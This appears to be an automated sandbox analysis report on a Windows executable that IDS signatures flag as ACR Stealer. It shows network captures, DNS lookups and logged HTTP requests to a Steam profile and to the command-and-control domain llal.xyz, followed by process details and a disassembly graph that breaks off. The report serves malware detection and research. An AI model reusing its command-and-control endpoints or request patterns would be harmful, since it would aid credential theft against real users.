                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                          2025-01-01T09:12:05.545826+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549704104.102.49.254443TCP
                                                                                                                                                                                          2025-01-01T09:12:06.422346+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549705188.114.96.3443TCP
                                                                                                                                                                                          2025-01-01T09:12:06.422346+01002052674ET MALWARE ACR Stealer CnC Checkin Attempt1192.168.2.549705188.114.96.3443TCP

                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Jan 1, 2025 09:12:04.343487024 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:04.343533039 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:04.343597889 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:04.354870081 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:04.354883909 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.003324986 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.003436089 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.102415085 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.102438927 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.102829933 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.103106976 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.126981974 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.171344995 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.545872927 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.545896053 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.545908928 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.546072960 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.546072960 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.546096087 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.546163082 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.640194893 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.640213966 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.640387058 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.640387058 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.640403032 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.643332005 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.645080090 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.645168066 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.649601936 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.649674892 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.649751902 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.649775028 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.649790049 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.649800062 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.649931908 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                          Jan 1, 2025 09:12:05.732177019 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                                                          Jan 1, 2025 09:12:05.732227087 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.732382059 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                                                          Jan 1, 2025 09:12:05.732709885 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                                                          Jan 1, 2025 09:12:05.732726097 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:06.208406925 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:06.208518982 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                                                          Jan 1, 2025 09:12:06.213376045 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                                                          Jan 1, 2025 09:12:06.213387012 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:06.213691950 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:06.213757038 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                                                          Jan 1, 2025 09:12:06.214087009 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                                                          Jan 1, 2025 09:12:06.259325981 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:06.422357082 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:06.422430038 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:06.422439098 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                                                          Jan 1, 2025 09:12:06.422547102 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                                                          Jan 1, 2025 09:12:06.485462904 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                                                          Jan 1, 2025 09:12:06.485491991 CET44349705188.114.96.3192.168.2.5

                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Jan 1, 2025 09:12:04.327714920 CET6136053192.168.2.51.1.1.1
                                                                                                                                                                                          Jan 1, 2025 09:12:04.334865093 CET53613601.1.1.1192.168.2.5
                                                                                                                                                                                          Jan 1, 2025 09:12:05.686605930 CET5324853192.168.2.51.1.1.1
                                                                                                                                                                                          Jan 1, 2025 09:12:05.711291075 CET53532481.1.1.1192.168.2.5

                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Jan 1, 2025 09:12:04.327714920 CET192.168.2.51.1.1.10x82fbStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Jan 1, 2025 09:12:05.686605930 CET192.168.2.51.1.1.10x8292Standard query (0)llal.xyzA (IP address)IN (0x0001)false

                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Jan 1, 2025 09:12:04.334865093 CET1.1.1.1192.168.2.50x82fbNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                          Jan 1, 2025 09:12:05.711291075 CET1.1.1.1192.168.2.50x8292No error (0)llal.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                          Jan 1, 2025 09:12:05.711291075 CET1.1.1.1192.168.2.50x8292No error (0)llal.xyz188.114.97.3A (IP address)IN (0x0001)false

                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                          • llal.xyz

                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.549704104.102.49.2544434396C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-01-01 08:12:05 UTC206OUTGET /profiles/76561199619938930 HTTP/1.1
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2025-01-01 08:12:05 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Date: Wed, 01 Jan 2025 08:12:05 GMT
                                                                                                                                                                                          Content-Length: 35137
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: sessionid=3a9a3929362069a998b4a6f6; Path=/; Secure; SameSite=None
                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                          2025-01-01 08:12:05 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                          2025-01-01 08:12:05 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                                                                                                                                                          Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                                                                                                                                          2025-01-01 08:12:05 UTC3768INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75
                                                                                                                                                                                          Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actu
                                                                                                                                                                                          2025-01-01 08:12:05 UTC506INData Raw: 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09
                                                                                                                                                                                          Data Ascii: >Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.549705188.114.96.34434396C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-01-01 08:12:06 UTC210OUTGET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                                                                                          Host: llal.xyz
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2025-01-01 08:12:06 UTC946INHTTP/1.1 521
                                                                                                                                                                                          Date: Wed, 01 Jan 2025 08:12:06 GMT
                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                          Content-Length: 15
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5L%2F8EUocKkYvuuHYJI1naz0ocR%2F8KyZzOBWB6DWzypfu6hhxMbKw28dJU1olwWMVT%2BWJq%2FnGSM7NgOEtsxrrSUT14GB6O6Tavp7EwmoWVJXi3TaE9YmPkOv4eA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Referrer-Policy: same-origin
                                                                                                                                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8fb10adb4b8a41c1-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1641&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2814&recv_bytes=848&delivery_rate=1699650&cwnd=205&unsent_bytes=0&cid=440ab95d55b28f4b&ts=226&x=0"
                                                                                                                                                                                          2025-01-01 08:12:06 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                                                                                                                                                                          Data Ascii: error code: 521


                                                                                                                                                                                          Statistics

                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:03:12:03
                                                                                                                                                                                          Start date:01/01/2025
                                                                                                                                                                                          Path:C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\OXoeX1Ii3x.exe"
                                                                                                                                                                                          Imagebase:0x200000
                                                                                                                                                                                          File size:378'368 bytes
                                                                                                                                                                                          MD5 hash:3E9881B9C6FF4994FC9D684456694E77
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                          Start time:03:12:07
                                                                                                                                                                                          Start date:01/01/2025
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1932
                                                                                                                                                                                          Imagebase:0x70000
                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Reset < >

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:2.4%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:4.7%
                                                                                                                                                                                            Total number of Nodes:727
                                                                                                                                                                                            Total number of Limit Nodes:4
                                                                                                                                                                                            execution_graph 33950 20f791 33973 20a85f 33950->33973 33954 20f7b6 34010 20efdd 33954->34010 33964 20f814 33965 20ac78 std::ios_base::_Init 39 API calls 33964->33965 33966 20f9c2 33965->33966 33967 20ac78 std::ios_base::_Init 39 API calls 33966->33967 33968 20f9ce 33967->33968 33969 20f9e8 33968->33969 34056 20be69 33968->34056 34062 23fc49 33969->34062 33974 20a87c 33973->33974 33974->33974 34065 20bb7d 33974->34065 33976 20a890 33977 20cba6 33976->33977 33978 20cbb2 __EH_prolog3 33977->33978 33979 20a85f std::ios_base::_Init 41 API calls 33978->33979 33980 20cbcb 33979->33980 33981 20cc0a 33980->33981 34130 20df81 41 API calls 2 library calls 33980->34130 34126 20ad83 33981->34126 33984 20cc18 33987 20cc20 33984->33987 33990 20cc6d 33984->33990 33985 20cbee 34131 20a805 33985->34131 33989 20cce6 46 API calls 33987->33989 33992 20cc30 33989->33992 34136 20fc37 41 API calls 2 library calls 33990->34136 33991 20ac78 std::ios_base::_Init 39 API calls 33991->33981 34135 20fba6 41 API calls 2 library calls 33992->34135 33995 20cc86 33997 20a805 41 API calls 33995->33997 33996 20cc50 33998 20a805 41 API calls 33996->33998 33999 20cc6b 33997->33999 34000 20cc5f 33998->34000 34001 20ac78 std::ios_base::_Init 39 API calls 33999->34001 34002 20ac78 std::ios_base::_Init 39 API calls 34000->34002 34004 20cca1 34001->34004 34002->33999 34003 20ccdc std::ios_base::_Init 34003->33954 34004->34003 34137 20fc37 41 API calls 2 library calls 34004->34137 34006 20ccc1 34007 20a805 41 API calls 34006->34007 34008 20ccd1 34007->34008 34009 20ac78 std::ios_base::_Init 39 API calls 34008->34009 34009->34003 34011 20efec __EH_prolog3_GS 34010->34011 34139 205f07 34011->34139 34013 20f00f 34143 205fb9 34013->34143 34015 20f025 34016 20a85f std::ios_base::_Init 41 API calls 34015->34016 34017 20f038 34016->34017 34163 205eb3 34017->34163 34019 20f049 34171 20e38d 34019->34171 34021 20f05d 34022 20ac78 std::ios_base::_Init 39 API calls 34021->34022 34023 20f06c 34022->34023 34024 20ac78 std::ios_base::_Init 39 API calls 34023->34024 34025 20f078 34024->34025 34026 20ac78 std::ios_base::_Init 39 API calls 34025->34026 34027 20f087 34026->34027 34028 20ac78 std::ios_base::_Init 39 API calls 34027->34028 34029 20f096 34028->34029 34187 205e6c 34029->34187 34031 20f0b3 34032 20ac78 std::ios_base::_Init 39 API calls 34031->34032 34033 20f0d7 34032->34033 34034 23fc49 5 API calls 34033->34034 34035 20f0de 34034->34035 34036 20cce6 34035->34036 34037 20ccf2 __EH_prolog3_GS 34036->34037 34038 20cd71 34037->34038 34041 20ac9e 41 API calls 34037->34041 34043 20a7e4 41 API calls 34037->34043 34274 2058a1 44 API calls 34037->34274 34039 23fc49 5 API calls 34038->34039 34042 20cd78 34039->34042 34041->34037 34044 20fa63 34042->34044 34043->34037 34045 20f7f7 34044->34045 34046 20fa79 34044->34046 34051 20ac78 34045->34051 34275 20ade0 34046->34275 34049 2202fe Concurrency::cancel_current_task KiUserExceptionDispatcher 34050 20fa92 34049->34050 34052 20ac83 34051->34052 34053 20ac8c 34051->34053 34054 20be69 std::ios_base::_Init 39 API calls 34052->34054 34055 205f62 14 API calls 2 library calls 34053->34055 34054->34053 34055->33964 34057 20bea1 34056->34057 34058 20beae messages 34056->34058 34289 205c91 39 API calls 2 library calls 34057->34289 34060 21ca60 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34058->34060 34061 20bed4 34060->34061 34061->33969 34063 21ca60 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34062->34063 34064 23fc53 34063->34064 34064->34064 34066 20bbed 34065->34066 34068 20bb94 std::ios_base::_Init 34065->34068 34079 205cb5 41 API calls std::ios_base::_Init 34066->34079 34071 20bb9b _Yarn 34068->34071 34072 20fa93 34068->34072 34071->33976 34073 20faa0 34072->34073 34074 20faa9 34072->34074 34080 210873 34073->34080 34076 20fab5 34074->34076 34095 21cc6b 34074->34095 34076->34071 34077 20faa6 34077->34071 34081 210884 34080->34081 34082 205bbc Concurrency::cancel_current_task 34080->34082 34083 21cc6b std::_Facet_Register 41 API calls 34081->34083 34109 2202fe 34082->34109 34084 21088a 34083->34084 34086 210891 34084->34086 34087 21089c 34084->34087 34086->34077 34113 22b834 39 API calls _Fputc 34087->34113 34088 205bd8 34112 205c40 40 API calls std::bad_exception::bad_exception 34088->34112 34091 205c11 34091->34077 34092 22b907 34114 22b915 11 API calls __FrameHandler3::FrameUnwindToState 34092->34114 34094 22b914 34097 21cc70 34095->34097 34098 21cc8a 34097->34098 34100 21cc8c 34097->34100 34115 225bb8 34097->34115 34123 22bd82 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 34097->34123 34098->34077 34101 205bbc Concurrency::cancel_current_task 34100->34101 34103 21cc96 std::_Facet_Register 34100->34103 34102 2202fe Concurrency::cancel_current_task KiUserExceptionDispatcher 34101->34102 34104 205bd8 34102->34104 34105 2202fe Concurrency::cancel_current_task KiUserExceptionDispatcher 34103->34105 34122 205c40 40 API calls std::bad_exception::bad_exception 34104->34122 34107 21d1de 34105->34107 34108 205c11 34108->34077 34110 220345 KiUserExceptionDispatcher 34109->34110 34111 220318 34109->34111 34110->34088 34111->34110 34112->34091 34113->34092 34114->34094 34119 23188c __Getctype 34115->34119 34116 2318ca 34125 224eb3 14 API calls __dosmaperr 34116->34125 34118 2318b5 RtlAllocateHeap 34118->34119 34120 2318c8 34118->34120 34119->34116 34119->34118 34124 22bd82 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 34119->34124 34120->34097 34122->34108 34123->34097 34124->34119 34125->34120 34127 20adc4 34126->34127 34129 20ad9a _Yarn 34126->34129 34138 20bdb4 41 API calls 2 library calls 34127->34138 34129->33984 34130->33985 34132 20a814 34131->34132 34133 20ad83 std::ios_base::_Init 41 API calls 34132->34133 34134 20a81d 34133->34134 34134->33991 34135->33996 34136->33995 34137->34006 34138->34129 34140 205f13 __EH_prolog3 34139->34140 34141 20a85f std::ios_base::_Init 41 API calls 34140->34141 34142 205f26 std::ios_base::_Init 34141->34142 34142->34013 34144 205fc5 __EH_prolog3 34143->34144 34191 205d26 34144->34191 34147 205d26 41 API calls 34148 205ff6 34147->34148 34197 20a756 34148->34197 34151 20ad83 std::ios_base::_Init 41 API calls 34152 20603b 34151->34152 34153 20a805 41 API calls 34152->34153 34154 206043 34153->34154 34155 20ad83 std::ios_base::_Init 41 API calls 34154->34155 34156 206051 34155->34156 34157 20a805 41 API calls 34156->34157 34158 206059 34157->34158 34159 20ac78 std::ios_base::_Init 39 API calls 34158->34159 34160 20607c 34159->34160 34161 20ac78 std::ios_base::_Init 39 API calls 34160->34161 34162 206088 std::ios_base::_Init 34161->34162 34162->34015 34164 205ebf __EH_prolog3 34163->34164 34209 205cc0 34164->34209 34168 205eed 34169 20ac78 std::ios_base::_Init 39 API calls 34168->34169 34170 205eff std::ios_base::_Init 34169->34170 34170->34019 34172 20e399 __EH_prolog3 34171->34172 34173 20a756 41 API calls 34172->34173 34174 20e3e8 34173->34174 34175 20a805 41 API calls 34174->34175 34176 20e3f3 34175->34176 34177 20a7e4 41 API calls 34176->34177 34178 20e400 34177->34178 34179 20a805 41 API calls 34178->34179 34180 20e40b 34179->34180 34181 20a7e4 41 API calls 34180->34181 34182 20e417 34181->34182 34183 20a805 41 API calls 34182->34183 34184 20e41f 34183->34184 34185 20a805 41 API calls 34184->34185 34186 20e427 std::ios_base::_Init 34185->34186 34186->34021 34188 205e78 __EH_prolog3 34187->34188 34238 205d86 34188->34238 34190 205ea5 std::ios_base::_Init 34190->34031 34192 205d32 __EH_prolog3_GS 34191->34192 34204 20e073 34192->34204 34195 23fc49 5 API calls 34196 205d7a 34195->34196 34196->34147 34198 20a768 34197->34198 34203 20602d 34197->34203 34199 20a783 _Yarn 34198->34199 34200 20a76f 34198->34200 34198->34203 34202 20be69 std::ios_base::_Init 39 API calls 34199->34202 34199->34203 34208 20baf1 41 API calls 2 library calls 34200->34208 34202->34203 34203->34151 34205 205d5a 34204->34205 34206 20e09d 34204->34206 34205->34195 34207 20bb7d std::ios_base::_Init 41 API calls 34206->34207 34207->34205 34208->34203 34210 205ccc __EH_prolog3_GS 34209->34210 34211 20e073 41 API calls 34210->34211 34212 205d05 34211->34212 34213 23fc49 5 API calls 34212->34213 34214 205d25 34213->34214 34215 20b324 34214->34215 34216 20b330 __EH_prolog3 34215->34216 34217 20a756 41 API calls 34216->34217 34218 20b374 34217->34218 34229 20a7e4 34218->34229 34221 20a805 41 API calls 34222 20b388 34221->34222 34233 20ac9e 34222->34233 34225 20a805 41 API calls 34226 20b39e 34225->34226 34227 20a7e4 41 API calls 34226->34227 34228 20b3aa std::ios_base::_Init 34227->34228 34228->34168 34230 